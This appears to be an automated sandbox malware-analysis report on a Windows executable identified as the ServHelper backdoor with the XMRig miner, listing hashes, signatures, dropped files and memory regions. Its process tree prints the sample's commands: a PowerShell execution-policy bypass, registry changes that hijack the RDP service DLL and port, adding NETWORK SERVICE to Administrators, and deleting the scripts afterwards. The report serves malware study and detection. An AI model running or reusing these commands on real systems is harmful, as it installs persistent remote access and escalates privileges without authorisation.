Analysis
-
max time kernel
116s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-09-2021 15:03
General
-
Target
748b112881047820f530c202bb59488e.exe
-
Size
4.0MB
-
MD5
748b112881047820f530c202bb59488e
-
SHA1
edf77f969bf54a47b21e6179cbcabb4651706d7c
-
SHA256
82285ac0988c68f9b9ecc7649cb9c6a3f3ecb242dd198465dbd4236d7fa6a59c
-
SHA512
252640d935ce3c7885fa48496b1b9c405f5dc9e719eda9c965d5fec46f877c00a7d96b14acf7410fbef9dbbfa9723932b54cdc75084fdd54e492eaa8d6f37ad6
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wgsr5gx1\wgsr5gx1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2CB.tmp" "c:\Users\Admin\AppData\Local\Temp\wgsr5gx1\CSC25A62393E6D843C397C3F863D8835D3E.TMP"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
C:\Users\Admin\AppData\Local\Temp\RESB2CB.tmpMD5
15d441756e8415b7ee2bf247b572aa20
SHA151eb1b89d61f023087718656d62a5e15d4ca8c5d
SHA256a2481e15d51bab275c0991ef3f4c4291a056dff9af8eda0fd83334997491cc35
SHA512dfd9061b8f5f909246118858c3e456267de99f808b29c0feae72db437282337cef57dadd4e7c8a4585e49dccfd59a2c784e6bfd198f5224fb4f07a386f3723d3
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
9cc8773f50008a3bce99c9d5e6cf4635
SHA1855d5ab66b3d0735e73008659c4a199d4492c8cb
SHA256d3c9d4a6db3fcee8b9af72fa8cc0b776264357a9f55498852a5e0792aed8603c
SHA512959ad4270b888ae45fd0ebc12fa2fbb3f695eb26012337dfdf136add2e1bcdcb470266c2fcdb747617dde5eaeb682cf8034f5b5907ff6f17c95135fb0d343d80
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\wgsr5gx1\wgsr5gx1.dllMD5
aeb477523fe13853ad37536a8e7e765f
SHA1cebc4d8a98c1fda175e3658f1390f206032320a1
SHA2564fdaf3a54355f6ca655a262f35d5195613cd375b65937b343484169e0bd844d7
SHA512b4748d6322545e34570b9a87b15cb99f1e06e481d6576367f942ca7409d9368fa7bb1cff38de491e83ad2caf64c5a211ccb4c44d55aea95908af1d5ab3b9f59c
-
\??\c:\Users\Admin\AppData\Local\Temp\wgsr5gx1\CSC25A62393E6D843C397C3F863D8835D3E.TMPMD5
54d51ab12903069c2df6c18a780d84c2
SHA1163cf39ab2ad3a9cc942f7848bc64ffd462d2350
SHA256579ab92cf58173e4f4bd7297de4f0194ee87c9096e85e7346a2a5aee03844c26
SHA5127167e7945c1b9371cacfa6a8f0481d79b4ec1544683f83a2fac52176bd2549d246ba7ff18d43f5b79993a8fb257af520d002720a59545614dd71ec9607148d29
-
\??\c:\Users\Admin\AppData\Local\Temp\wgsr5gx1\wgsr5gx1.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\wgsr5gx1\wgsr5gx1.cmdlineMD5
d29b294fcd16202a617f47de773f2038
SHA1e68df0b544e5edc2f974b61749416b82c6685da6
SHA256f279b7c634c06923856c7a804e239254da2cccdeb0e9cc46705711cb20835639
SHA512c5c541bb418567f311e7fbeda3661de1523697b164b82aa5504c52bd74032a484a7db298334ef996fa8e141c725875fcdd75a17efe2ccfe77b9a9d07c3386d7c
-
memory/512-442-0x0000000006722000-0x0000000006723000-memory.dmpFilesize
4KB
-
memory/512-432-0x0000000000000000-mapping.dmp
-
memory/512-440-0x0000000006720000-0x0000000006721000-memory.dmpFilesize
4KB
-
memory/512-467-0x000000007EF60000-0x000000007EF61000-memory.dmpFilesize
4KB
-
memory/640-962-0x0000000000000000-mapping.dmp
-
memory/916-1025-0x0000000000000000-mapping.dmp
-
memory/1312-1026-0x0000000000000000-mapping.dmp
-
memory/1340-964-0x0000000000000000-mapping.dmp
-
memory/1676-1001-0x0000000000000000-mapping.dmp
-
memory/1796-1002-0x0000000000000000-mapping.dmp
-
memory/2412-121-0x00000000010E0000-0x00000000010E1000-memory.dmpFilesize
4KB
-
memory/2412-119-0x0000000005BA0000-0x0000000005BA1000-memory.dmpFilesize
4KB
-
memory/2412-120-0x0000000005840000-0x0000000005841000-memory.dmpFilesize
4KB
-
memory/2412-123-0x0000000000303000-0x0000000000304000-memory.dmpFilesize
4KB
-
memory/2412-118-0x0000000000302000-0x0000000000303000-memory.dmpFilesize
4KB
-
memory/2412-117-0x0000000000300000-0x0000000000301000-memory.dmpFilesize
4KB
-
memory/2412-122-0x0000000007CE0000-0x0000000007CE1000-memory.dmpFilesize
4KB
-
memory/2412-124-0x0000000000304000-0x0000000000305000-memory.dmpFilesize
4KB
-
memory/2412-115-0x00000000052A0000-0x000000000569F000-memory.dmpFilesize
4.0MB
-
memory/2588-1005-0x0000000000000000-mapping.dmp
-
memory/2612-131-0x0000000007F80000-0x0000000007F81000-memory.dmpFilesize
4KB
-
memory/2612-144-0x0000000009F50000-0x0000000009F51000-memory.dmpFilesize
4KB
-
memory/2612-153-0x0000000007460000-0x0000000007461000-memory.dmpFilesize
4KB
-
memory/2612-128-0x0000000005180000-0x0000000005181000-memory.dmpFilesize
4KB
-
memory/2612-155-0x0000000005133000-0x0000000005134000-memory.dmpFilesize
4KB
-
memory/2612-176-0x0000000009A30000-0x0000000009A31000-memory.dmpFilesize
4KB
-
memory/2612-129-0x0000000007800000-0x0000000007801000-memory.dmpFilesize
4KB
-
memory/2612-135-0x0000000005132000-0x0000000005133000-memory.dmpFilesize
4KB
-
memory/2612-130-0x0000000007EE0000-0x0000000007EE1000-memory.dmpFilesize
4KB
-
memory/2612-136-0x0000000008050000-0x0000000008051000-memory.dmpFilesize
4KB
-
memory/2612-137-0x0000000008A90000-0x0000000008A91000-memory.dmpFilesize
4KB
-
memory/2612-138-0x0000000008930000-0x0000000008931000-memory.dmpFilesize
4KB
-
memory/2612-133-0x0000000008240000-0x0000000008241000-memory.dmpFilesize
4KB
-
memory/2612-134-0x0000000005130000-0x0000000005131000-memory.dmpFilesize
4KB
-
memory/2612-1124-0x000000007ED20000-0x000000007ED21000-memory.dmpFilesize
4KB
-
memory/2612-145-0x0000000009670000-0x0000000009671000-memory.dmpFilesize
4KB
-
memory/2612-125-0x0000000000000000-mapping.dmp
-
memory/2636-1007-0x0000000000000000-mapping.dmp
-
memory/2864-1009-0x0000000000000000-mapping.dmp
-
memory/2912-149-0x0000000000000000-mapping.dmp
-
memory/3052-1008-0x0000000000000000-mapping.dmp
-
memory/3248-963-0x0000000000000000-mapping.dmp
-
memory/3296-1012-0x0000000000000000-mapping.dmp
-
memory/3628-177-0x0000000000000000-mapping.dmp
-
memory/3628-212-0x000000007F090000-0x000000007F091000-memory.dmpFilesize
4KB
-
memory/3628-182-0x0000000005090000-0x0000000005091000-memory.dmpFilesize
4KB
-
memory/3628-183-0x0000000005092000-0x0000000005093000-memory.dmpFilesize
4KB
-
memory/3628-198-0x0000000008CA0000-0x0000000008CD3000-memory.dmpFilesize
204KB
-
memory/3628-412-0x0000000008F20000-0x0000000008F21000-memory.dmpFilesize
4KB
-
memory/3628-406-0x0000000008F30000-0x0000000008F31000-memory.dmpFilesize
4KB
-
memory/3628-213-0x0000000008F90000-0x0000000008F91000-memory.dmpFilesize
4KB
-
memory/3628-206-0x0000000008C80000-0x0000000008C81000-memory.dmpFilesize
4KB
-
memory/3628-211-0x0000000008DE0000-0x0000000008DE1000-memory.dmpFilesize
4KB
-
memory/3836-1010-0x0000000000000000-mapping.dmp
-
memory/3840-1011-0x0000000000000000-mapping.dmp
-
memory/3856-1006-0x0000000000000000-mapping.dmp
-
memory/3952-723-0x000000007F7B0000-0x000000007F7B1000-memory.dmpFilesize
4KB
-
memory/3952-683-0x0000000000000000-mapping.dmp
-
memory/3952-699-0x0000000006C22000-0x0000000006C23000-memory.dmpFilesize
4KB
-
memory/3952-698-0x0000000006C20000-0x0000000006C21000-memory.dmpFilesize
4KB
-
memory/4056-146-0x0000000000000000-mapping.dmp